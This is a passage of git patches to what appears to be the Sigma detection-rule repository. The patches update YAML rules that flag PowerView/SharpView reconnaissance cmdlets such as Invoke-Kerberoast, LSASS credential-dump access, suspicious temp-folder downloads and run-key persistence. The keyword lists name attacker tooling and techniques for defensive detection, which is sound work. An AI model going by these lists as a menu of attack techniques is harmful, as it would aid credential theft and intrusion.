Get-WMIProcess - - Find-InterestingFile - - Invoke-UserHunter - - Find-DomainUserLocation - - Invoke-ProcessHunter - - Find-DomainProcess - - Invoke-EventHunter - - Find-DomainUserEvent - - Invoke-ShareFinder - - Find-DomainShare - - Invoke-FileFinder - - Find-InterestingDomainShareFile - - Find-LocalAdminAccess - - Invoke-EnumerateLocalAdmin - - Find-DomainLocalGroupMember - - Get-NetDomainTrust - - Get-DomainTrust - - Get-NetForestTrust - - Get-ForestTrust - - Find-ForeignUser - - Get-DomainForeignUser - - Find-ForeignGroup - - Get-DomainForeignGroupMember - - Invoke-MapDomainTrust - - Get-DomainTrustMapping - condition: selection + selection: + ScriptBlockText|contains: + - Export-PowerViewCSV + - Get-IPAddress + - Resolve-IPAddress + - Convert-NameToSid + - ConvertTo-SID + - Convert-ADName + - ConvertFrom-UACValue + - Add-RemoteConnection + - Remove-RemoteConnection + - Invoke-UserImpersonation + - Invoke-RevertToSelf + - Request-SPNTicket + - Get-DomainSPNTicket + - Invoke-Kerberoast + - Get-PathAcl + - Get-DNSZone + - Get-DomainDNSZone + - Get-DNSRecord + - Get-DomainDNSRecord + - Get-NetDomain + - Get-Domain + - Get-NetDomainController + - Get-DomainController + - Get-NetForest + - Get-Forest + - Get-NetForestDomain + - Get-ForestDomain + - Get-NetForestCatalog + - Get-ForestGlobalCatalog + - Find-DomainObjectPropertyOutlier + - Get-NetUser + - Get-DomainUser + - New-DomainUser + - Set-DomainUserPassword + - Get-UserEvent + - Get-DomainUserEvent + - Get-NetComputer + - Get-DomainComputer + - Get-ADObject + - Get-DomainObject + - Set-ADObject + - Set-DomainObject + - Get-ObjectAcl + - Get-DomainObjectAcl + - Add-ObjectAcl + - Add-DomainObjectAcl + - Invoke-ACLScanner + - Find-InterestingDomainAcl + - Get-NetOU + - Get-DomainOU + - Get-NetSite + - Get-DomainSite + - Get-NetSubnet + - Get-DomainSubnet + - Get-DomainSID + - Get-NetGroup + - Get-DomainGroup + - New-DomainGroup + - Find-ManagedSecurityGroups + - Get-DomainManagedSecurityGroup + - Get-NetGroupMember + - Get-DomainGroupMember + - Add-DomainGroupMember + - Get-NetFileServer + - Get-DomainFileServer + - Get-DFSshare + - Get-DomainDFSShare + - Get-NetGPO + - Get-DomainGPO + - Get-NetGPOGroup + - Get-DomainGPOLocalGroup + - Find-GPOLocation + - Get-DomainGPOUserLocalGroupMapping + - Find-GPOComputerAdmin + - Get-DomainGPOComputerLocalGroupMapping + - Get-DomainPolicy + - Get-NetLocalGroup + - Get-NetLocalGroupMember + - Get-NetShare + - Get-NetLoggedon + - Get-NetSession + - Get-LoggedOnLocal + - Get-RegLoggedOn + - Get-NetRDPSession + - Invoke-CheckLocalAdminAccess + - Test-AdminAccess + - Get-SiteName + - Get-NetComputerSiteName + - Get-Proxy + - Get-WMIRegProxy + - Get-LastLoggedOn + - Get-WMIRegLastLoggedOn + - Get-CachedRDPConnection + - Get-WMIRegCachedRDPConnection + - Get-RegistryMountedDrive + - Get-WMIRegMountedDrive + - Get-NetProcess + - Get-WMIProcess + - Find-InterestingFile + - Invoke-UserHunter + - Find-DomainUserLocation + - Invoke-ProcessHunter + - Find-DomainProcess + - Invoke-EventHunter + - Find-DomainUserEvent + - Invoke-ShareFinder + - Find-DomainShare + - Invoke-FileFinder + - Find-InterestingDomainShareFile + - Find-LocalAdminAccess + - Invoke-EnumerateLocalAdmin + - Find-DomainLocalGroupMember + - Get-NetDomainTrust + - Get-DomainTrust + - Get-NetForestTrust + - Get-ForestTrust + - Find-ForeignUser + - Get-DomainForeignUser + - Find-ForeignGroup + - Get-DomainForeignGroupMember + - Invoke-MapDomainTrust + - Get-DomainTrustMapping + condition: selection falsepositives: - Should not be any as administrators do not use this tool level: high diff --git a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml index 3282e8630..1a9204e31 100644 --- a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml +++ b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml @@ -13,6 +13,7 @@ tags: - attack.s0190 - attack.t1036.003 date: 2022/06/28 +modified: 2022/09/13 author: Florian Roth logsource: category: process_creation @@ -28,6 +29,7 @@ detection: CommandLine|contains: - 'C:\Windows\Temp\' - '%temp%' + - '%tmp%' - 'C:\ProgramData\' - '%ProgramData%' - '\AppData\Local\' diff --git a/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml b/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml index 734fa9286..dada69bd7 100644 --- a/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml +++ b/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml @@ -19,6 +19,7 @@ detection: - ' > \Users\Public\' - ' > C:\Users\Public\' - ' > %TEMP%\' + - ' > %TMP%\' condition: selection falsepositives: - Legitimate admin scripts diff --git a/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml b/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml index f20dced4e..d608a60d4 100644 --- a/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml +++ b/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml @@ -7,51 +7,52 @@ references: - https://www.virusradar.com/en/Win32_Kasidet.AD/description - https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100 date: 2020/05/25 -modified: 2022/01/07 +modified: 2022/09/13 logsource: category: process_creation product: windows detection: - selection1: - Image|endswith: '\netsh.exe' - CommandLine|contains|all: - - 'firewall' - - 'add' - - 'allowedprogram' - selection2: - Image|endswith: '\netsh.exe' - CommandLine|contains|all: - - 'advfirewall' - - 'firewall' - - 'add' - - 'rule' - - 'action=allow' - - 'program=' - susp_image: - - CommandLine|contains: - - '%TEMP%' - - ':\RECYCLER\' - - 'C:\$Recycle.bin\' - - ':\SystemVolumeInformation\' - - 'C:\Windows\Temp\' - - 'C:\Temp\' - - 'C:\Users\Public\' - - 'C:\Users\Default\' - - 'C:\Users\Desktop\' - - '\Downloads\' - - '\Temporary Internet Files\Content.Outlook\' - - '\Local Settings\Temporary Internet Files\' - - CommandLine|startswith: - - 'C:\Windows\Tasks\' - - 'C:\Windows\debug\' - - 'C:\Windows\fonts\' - - 'C:\Windows\help\' - - 'C:\Windows\drivers\' - - 'C:\Windows\addins\' - - 'C:\Windows\cursors\' - - 'C:\Windows\system32\tasks\' - - '%Public%\' - condition: (selection1 or selection2) and susp_image + selection1: + Image|endswith: '\netsh.exe' + CommandLine|contains|all: + - 'firewall' + - 'add' + - 'allowedprogram' + selection2: + Image|endswith: '\netsh.exe' + CommandLine|contains|all: + - 'advfirewall' + - 'firewall' + - 'add' + - 'rule' + - 'action=allow' + - 'program=' + susp_image: + - CommandLine|contains: + - '%TEMP%' + - '%TMP%' + - ':\RECYCLER\' + - 'C:\$Recycle.bin\' + - ':\SystemVolumeInformation\' + - 'C:\Windows\Temp\' + - 'C:\Temp\' + - 'C:\Users\Public\' + - 'C:\Users\Default\' + - 'C:\Users\Desktop\' + - '\Downloads\' + - '\Temporary Internet Files\Content.Outlook\' + - '\Local Settings\Temporary Internet Files\' + - CommandLine|startswith: + - 'C:\Windows\Tasks\' + - 'C:\Windows\debug\' + - 'C:\Windows\fonts\' + - 'C:\Windows\help\' + - 'C:\Windows\drivers\' + - 'C:\Windows\addins\' + - 'C:\Windows\cursors\' + - 'C:\Windows\system32\tasks\' + - '%Public%\' + condition: (1 of selection*) and susp_image falsepositives: - Legitimate administration level: high diff --git a/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml b/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml index aa0568d75..1182bd8b4 100644 --- a/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml +++ b/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml @@ -9,6 +9,7 @@ author: frack113, Nasreddine Bencherchali references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import date: 2022/08/01 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -20,6 +21,7 @@ detection: CommandLine|contains: - 'C:\Users\' - '%temp%' + - '%tmp%' - '%appdata%' - '\AppData\Local\Temp\' - 'C:\Windows\Temp\' diff --git a/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml b/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml index 7815daee9..5ca802523 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml @@ -9,7 +9,7 @@ references: - https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt - https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/ date: 2020/07/03 -modified: 2022/07/28 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -24,6 +24,7 @@ detection: - '\Temp\' - '%AppData%' - '%Temp%' + - '%tmp%' - '%Public%' - '\Desktop\' selection_susp_extensions: diff --git a/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml b/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml index be17123fc..cddb6c356 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml @@ -9,6 +9,7 @@ author: Nasreddine Bencherchali references: - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/ date: 2022/08/02 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -34,6 +35,7 @@ detection: - '\Temp\' - '%AppData%' - '%Temp%' + - '%tmp%' - '%Public%' - '\Desktop\' - 'C:\Windows\' diff --git a/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml b/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml index 07b7eb8f6..8d625c51f 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml @@ -11,7 +11,7 @@ references: - https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml - https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp date: 2022/07/12 -modified: 2022/07/14 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -31,6 +31,7 @@ detection: - '\Users\Public\' - '\WINDOWS\Temp\' - '%temp%' + - '%tmp%' - '%appdata%' condition: all of selection_* falsepositives: diff --git a/rules/windows/process_creation/proc_creation_win_susp_recon.yml b/rules/windows/process_creation/proc_creation_win_susp_recon.yml index 7af331728..5e97ea32b 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_recon.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_recon.yml @@ -3,6 +3,7 @@ id: aa2efee7-34dd-446e-8a37-40790a66efd7 status: experimental author: frack113 date: 2021/07/30 +modified: 2022/09/13 description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md @@ -24,7 +25,9 @@ detection: - 'DOSKEY.EXE' - 'sc.exe' selection_redirect: - ParentCommandLine|contains: ' > %TEMP%\' + ParentCommandLine|contains: + - ' > %TEMP%\' + - ' > %TMP%\' condition: all of selection* falsepositives: - Unknown diff --git a/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml b/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml index e0074c19a..daae592e1 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml @@ -1,4 +1,4 @@ -title: Suspicious Execution of SharpView Aka PowerView +title: Suspicious Execution of SharpView Aka PowerView id: b2317cfa-4a47-4ead-b3ff-297438c0bc2d status: experimental description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems @@ -8,14 +8,15 @@ references: - https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview date: 2021/12/10 +modified: 2022/09/13 logsource: category: process_creation product: windows detection: - sharpview: - OriginalFileName: SharpView.exe - sharpview_methods: - Commandline|contains: + selection: + - OriginalFileName: SharpView.exe + - Image|endswith: '\SharpView.exe' + - Commandline|contains: - Get-DomainGPOUserLocalGroupMapping - Find-GPOLocation - Get-DomainGPOComputerLocalGroupMapping @@ -142,7 +143,8 @@ detection: - Get-DomainPolicy - Get-DomainGPOLocalGroup - Get-NetGPOGroup - condition: sharpview or sharpview_methods + - Invoke-Sharefinder + condition: selection falsepositives: - Unknown level: high diff --git a/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml b/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml index a7895ad42..95a4a857c 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml @@ -10,6 +10,7 @@ tags: - attack.t1218.011 author: Christian Burkard date: 2021/11/24 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -23,6 +24,7 @@ detection: - '%AppData%' - '%LocalAppData%' - '%Temp%' + - '%tmp%' - '\AppData\' - '\Temp\' - '\Users\Public\' diff --git a/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml b/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml index 999d77e14..7eba3a23c 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml @@ -7,7 +7,7 @@ references: - https://thedfirreport.com/2020/10/08/ryuks-return/ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker date: 2020/10/12 -modified: 2022/08/24 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -34,6 +34,7 @@ detection: - '\Windows\Temp\' - '\AppData\Local\' - '%temp%' + - '%tmp%' - '%ProgramData%' - '%appdata%' - '%comspec%' diff --git a/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml b/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml index 96d0c1676..b68f4b1eb 100644 --- a/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml +++ b/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml @@ -6,6 +6,7 @@ references: - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea) author: Nasreddine Bencherchali date: 2022/07/28 +modified: 2022/09/13 logsource: category: registry_set product: windows @@ -29,6 +30,7 @@ detection: - '\Microsoft\Windows\Start Menu\Programs\Startup\' - '\System32\spool\drivers\color\' # as seen in the knotweed blog - '%temp%' + - '%tmp%' - '%appdata%' condition: selection falsepositives: diff --git a/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml b/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml index 52af03166..58cc3cf87 100644 --- a/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml +++ b/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml @@ -11,6 +11,7 @@ references: - https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/ - https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN date: 2022/08/10 +modified: 2022/09/13 logsource: category: registry_set product: windows @@ -29,6 +30,7 @@ detection: - '\Desktop\' - '\Downloads\' - '%temp%' + - '%tmp%' - 'iex' - 'Invoke-' - 'rundll32' diff --git a/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml b/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml index d27416050..ede76c2ee 100755 --- a/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml +++ b/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml @@ -6,17 +6,17 @@ references: - https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html author: Florian Roth, Markus Neis, Sander Wiebing date: 2018/08/25 -modified: 2022/03/26 +modified: 2022/09/13 logsource: category: registry_set product: windows detection: - selection: - EventType: SetValue - TargetObject|contains: + selection_target: + EventType: SetValue + TargetObject|contains: - '\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\' - '\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\' - selection2: + selection_details: - Details|contains: - 'C:\Windows\Temp\' - 'C:\$Recycle.bin\' @@ -25,11 +25,13 @@ detection: - 'C:\Users\Default\' - 'C:\Users\Desktop\' - '\AppData\Local\Temp\' + - '%temp%\' + - '%tmp%\' - Details|startswith: - '%Public%\' - 'wscript' - 'cscript' - condition: selection and selection2 + condition: all of selection_* fields: - Image falsepositives: @@ -37,4 +39,4 @@ falsepositives: level: high tags: - attack.persistence - - attack.t1547.001 \ No newline at end of file + - attack.t1547.001 From 264bc0787d6a0ecd8f81e3f3a2b8580a9f5288e2 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 13 Sep 2022 11:30:27 +0200 Subject: [PATCH 17/96] fix: FP with Malwarebytes --- .../proc_access_win_cred_dump_lsass_access.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml b/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml index ab575a468..b322595a4 100755 --- a/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml +++ b/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml @@ -5,7 +5,7 @@ description: Detects process access LSASS memory which is typical for credential author: Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community (update) date: 2017/02/16 -modified: 2022/07/05 +modified: 2022/09/13 references: - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html @@ -119,6 +119,9 @@ detection: filter_webex: SourceImage|endswith: '\AppData\Local\WebEx\WebexHost.exe' GrantedAccess: '0x401' + filter_malwarebytes: + SourceImage: 'C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\ctlrupdate\mbupdatr.exe' + GrantedAccess: '0x1410' # Old - too broad filter # SourceImage|endswith: # easy to bypass. need to implement supportive rule to detect bypass attempts # - '\wmiprvse.exe' From 3b4fc8c3fdf809062a19249d8531a16137d97d63 Mon Sep 17 00:00:00 2001 From: Qasim Qlf Date: Tue, 13 Sep 2022 16:02:17 +0500 Subject: [PATCH 18/96] VS Code Filter Fix - Undo the last commit Previous Filter of Image was wrong. Image can't endsWith (Code.exe and attrib.exe) at the same time. Same condition with other scenario. CommandLine filter is good. --- .../proc_creation_win_file_permission_modifications.yml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml b/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml index 32e4c6c75..f29b6b107 100644 --- a/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml +++ b/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml @@ -7,7 +7,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11) date: 2019/10/23 -modified: 2022/09/03 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -30,8 +30,7 @@ detection: - 'ICACLS C:\ProgramData\dynatrace\gateway\config\config.properties /grant :r ' - 'S-1-5-19:F' filter_programs: - - Image|contains: '\AppData\Local\Programs\Microsoft VS Code' - - Image|endswith: '\Microsoft VS Code\Code.exe' + CommandLine|contains: '\AppData\Local\Programs\Microsoft VS Code' condition: 1 of selection* and not 1 of filter* fields: - ComputerName From 67bca9674440b54436d015c6cccb754d4f9c96bd Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 13 Sep 2022 13:13:16 +0200 Subject: [PATCH 19/96] fix: wrong image selection --- .../proc_creation_win_file_permission_modifications.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml b/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml index f29b6b107..5a21b2149 100644 --- a/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml +++ b/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml @@ -30,7 +30,8 @@ detection: - 'ICACLS C:\ProgramData\dynatrace\gateway\config\config.properties /grant :r ' - 'S-1-5-19:F' filter_programs: - CommandLine|contains: '\AppData\Local\Programs\Microsoft VS Code' + - CommandLine|contains: '\AppData\Local\Programs\Microsoft VS Code' + - ParentImage|endswith: '\Microsoft VS Code\Code.exe' condition: 1 of selection* and not 1 of filter* fields: - ComputerName From 2ed0605dc41ec0ba7e6b3e0619894b686ee01a1e Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Tue, 13 Sep 2022 15:52:07 +0200 Subject: [PATCH 20/96] Revert "Revert "Merge branch 'master' of github.com:elhoim/sigma"" This reverts commit 6c1761a7b742cd7fcbde5dc2cfd92db6ebefe062. --- .../windows/file_change/file_change_win_2022_timestomping.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/file_change/file_change_win_2022_timestomping.yml b/rules/windows/file_change/file_change_win_2022_timestomping.yml index cfdf05658..0a2643eaf 100644 --- a/rules/windows/file_change/file_change_win_2022_timestomping.yml +++ b/rules/windows/file_change/file_change_win_2022_timestomping.yml @@ -8,7 +8,7 @@ references: - https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html author: frack113, Florian Roth date: 2022/08/12 -modified: 2022/09/05 +modified: 2022/09/09 tags: - attack.t1070.006 - attack.defense_evasion @@ -33,7 +33,7 @@ detection: - TargetFilename|endswith: - '.tmp' - '.temp' - condition: ( selection1 and not filter1 ) or ( selection2 and not filter2 ) and not 1 of gen_filter* + condition: (( selection1 and not filter1 ) or ( selection2 and not filter2 )) and not 1 of gen_filter* falsepositives: - Changes made to or by the local NTP service level: high From fb44c6fa8709d116de3c25be623704a12375e1c0 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Tue, 13 Sep 2022 22:14:45 +0200 Subject: [PATCH 21/96] Update meta info --- rules/web/web_cve_2022_31659_vmware_rce.yml | 2 +- .../pipe_created_susp_cobaltstrike_pipe_patterns.yml | 2 +- .../registry_set/registry_set_disable_winevt_logging.yml | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/web/web_cve_2022_31659_vmware_rce.yml b/rules/web/web_cve_2022_31659_vmware_rce.yml index f4c8b747d..8060bcb42 100644 --- a/rules/web/web_cve_2022_31659_vmware_rce.yml +++ b/rules/web/web_cve_2022_31659_vmware_rce.yml @@ -11,7 +11,7 @@ logsource: detection: selection: cs-method: 'POST' - c-uri|contains: '/SAAS/jersey/manager/api/migrate/tenant' # Investigate the host header to spot the difference between benign and malicious requests to this URL + c-uri|contains: '/SAAS/jersey/manager/api/migrate/tenant' # Investigate the contents of the post body and look for any suspicious hosts that might be controlled by the attacker condition: selection falsepositives: - Vulnerability scanners diff --git a/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml b/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml index 5a47a8919..3677db9fd 100644 --- a/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml +++ b/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml @@ -56,5 +56,5 @@ detection: - '\MsFteWds' condition: 1 of selection_malleable_profile* and not filter falsepositives: - - Chrome instances using the exactly same name pipe named mojo.something + - Chrome instances using the exact same pipe name "mojo.something" level: high diff --git a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml index 04c010857..452485411 100644 --- a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml +++ b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml @@ -27,7 +27,7 @@ detection: TargetObject|contains: - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-FileInfoMinifilter' - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ASN1\' - filter_empty: + filter_empty: # This filter is related to aurora. Should be removed when fix is deployed. # TODO: Remove later Image: - '' - null From 653ad66f21010ab20a7c24f7fdb2931460dfe1e3 Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Wed, 14 Sep 2022 12:29:57 +0200 Subject: [PATCH 22/96] Updates --- .../win_susp_logon_newcredentials.yml | 0 .../proc_creation_win_dnscmd_discovery.yml | 20 +++++----- ...l => proc_creation_win_ntdsutil_usage.yml} | 18 ++++----- .../proc_creation_win_susp_ditsnap.yml | 23 ++++++----- .../proc_creation_win_susp_ntdsutil_usage.yml | 38 +++++++++++++++++++ ..._creation_win_weak_or_abused_passwords.yml | 26 +++++++++++++ 6 files changed, 95 insertions(+), 30 deletions(-) rename rules/windows/builtin/{ => security}/win_susp_logon_newcredentials.yml (100%) rename rules/windows/process_creation/{proc_creation_win_susp_ntdsutil.yml => proc_creation_win_ntdsutil_usage.yml} (57%) create mode 100644 rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml create mode 100644 rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml diff --git a/rules/windows/builtin/win_susp_logon_newcredentials.yml b/rules/windows/builtin/security/win_susp_logon_newcredentials.yml similarity index 100% rename from rules/windows/builtin/win_susp_logon_newcredentials.yml rename to rules/windows/builtin/security/win_susp_logon_newcredentials.yml diff --git a/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml b/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml index 2cdf79b9f..805d9eeae 100644 --- a/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml +++ b/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml @@ -1,23 +1,24 @@ title: Discovery/Execution via dnscmd.exe id: b6457d63-d2a2-4e29-859d-4e7affc153d1 -description: | +description: | Detects an attempt to add a potentially crafted DLL as a plug in of the DNS Service. Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain references: - - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd - - https://docs.microsoft.com/en-us/azure/dns/dns-zones-records - - https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/ + - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd + - https://docs.microsoft.com/en-us/azure/dns/dns-zones-records + - https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/ status: experimental author: '@gott_cyber' date: 2022/07/31 +modified: 2022/09/14 tags: - - attack.discovery - - attack.execution - - attack.t1543.003 + - attack.discovery + - attack.execution + - attack.t1543.003 logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: dnscmd: Image|endswith: '\dnscmd.exe' @@ -25,6 +26,7 @@ detection: CommandLine|contains: - '/enumrecords' - '/enumzones' + - '/ZonePrint' - '/info' selection_2: CommandLine|contains|all: diff --git a/rules/windows/process_creation/proc_creation_win_susp_ntdsutil.yml b/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml similarity index 57% rename from rules/windows/process_creation/proc_creation_win_susp_ntdsutil.yml rename to rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml index ff90db27b..312a8ba58 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_ntdsutil.yml +++ b/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml @@ -4,19 +4,19 @@ status: test description: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT) author: Thomas Patzke references: - - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm + - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm date: 2019/01/16 modified: 2022/03/11 # increased level logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: - selection: - Image|endswith: '\ntdsutil.exe' - condition: selection + selection: + Image|endswith: '\ntdsutil.exe' + condition: selection falsepositives: - - NTDS maintenance + - NTDS maintenance level: medium tags: - - attack.credential_access - - attack.t1003.003 + - attack.credential_access + - attack.t1003.003 diff --git a/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml b/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml index 780851390..e6c83822a 100644 --- 